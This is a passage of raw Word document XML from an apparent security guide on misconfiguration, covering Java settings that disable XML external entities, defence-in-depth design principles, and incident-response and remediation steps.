        <w:t>dbf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0600C7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DocumentBuilderFactory.newInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135897D4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbf.setFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("http://xml.org/sax/features/external-general-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C56912" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>entities", false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CB533" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbf.setFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("http://xml.org/sax/features/inner-external-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A04150" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>general-entities", false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F68775" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Architecture &amp; Design Principles (Defense-in-Depth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B774D6"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lastRenderedPageBreak/>
        <w:t>Because configuration spans across code, servers, and cloud layers, a systemic architectural approach is necessary to structurally block and contain misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A0DB5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Infrastructure as Code (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) &amp; Immutable Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABCBC08" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Shift away from manually setting up server environments, cloud buckets, or container properties. Define the entire environment infrastructure in code templates using tools like Terraform, CloudFormation, or Ansible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15867299" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>This allows configurations to undergo peer code reviews and automated static analysis scanning before provisioning, ensuring uniform deployment configurations across dev, staging, and production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E71C70" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Principle of Least Privilege &amp; Micro-Segmentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3AF21D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Architect applications assuming that a component configuration breach </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> happen. Apply network segmentation, containerization, and cloud security groups (Network ACLs) to isolate systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42674549" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Services should only have the bare minimum permissions necessary to execute. For example, an application server container should communicate with a database container through a strictly scoped private network, lacking permission to read or modify external cloud resources or nearby microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED9DA03" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Zero-Trust Network Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D6C6C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Treat internal network traffic with the same level of suspicion as external public traffic. Eliminate open unauthenticated administrative endpoints inside internal corporate networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A854214" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce continuous validation—requiring multi-factor authentication, cryptographic machine-to-machine identity validation, and short-lived tokens/secrets instead of hardcoding static access keys within configuration properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3544C0C0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Incident Response &amp; Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A3442B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Immediate Containment (Stopping the Bleeding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AE4DC"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If an active exploitation of a security misconfiguration is detected in production, the primary goal is to isolate the threat and break the attacker's foothold immediately without destroying forensic evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAB173" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy Targeted Web Application Firewall (WAF) Rules:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the exploit targets a known exposed endpoint (e.g., a leaked management console </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a vulnerable XML parsing endpoint), configure the WAF to drop all traffic directed at </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>those specific URI paths or block requests originating from the attacker's IP blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F666769" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Disable or Isolate the Affected Feature:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a specific service, feature, or cloud component is misconfigured (e.g., an overly permissive S3 bucket or an active debugging framework like Django's </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>DEBUG=True</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), instantly toggle it off, update the environmental flag, or modify cloud access control lists (ACLs) to block all public ingress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A10CB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Revoke Sessions and Credentials:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the attacker gained access via default credentials, unremoved sample app accounts, or leaked system tokens, immediately change the master password, revoke all active session tokens, and cycle any compromised database or API keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F831A15" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Network Segmentation/Isolation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If an attacker has established a foothold inside a container or server due to a configuration gap, isolate the virtual machine or container from the rest of the production network by updating Security Groups/Firewall rules to prevent lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C6569" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Remediation &amp; Patching (The Permanent Fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B0F16"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Once the immediate threat is contained, the temporary blocks must be replaced with permanent infrastructure hardening to ensure the flaw cannot be reintroduced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EA3B1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement Automated Hardening Scripts (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Customization):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconfigure the deployment pipeline to strip out all non-essential default assets. Automate the removal of sample applications, documentation, default accounts, and testing frameworks from production builds. Ensure all environments (Dev, QA, Prod) are spun up from identical, hardened Infrastructure as Code (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) templates (e.g., Ansible, Terraform).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337AC24D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Establish Configuration Drift Auditing:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
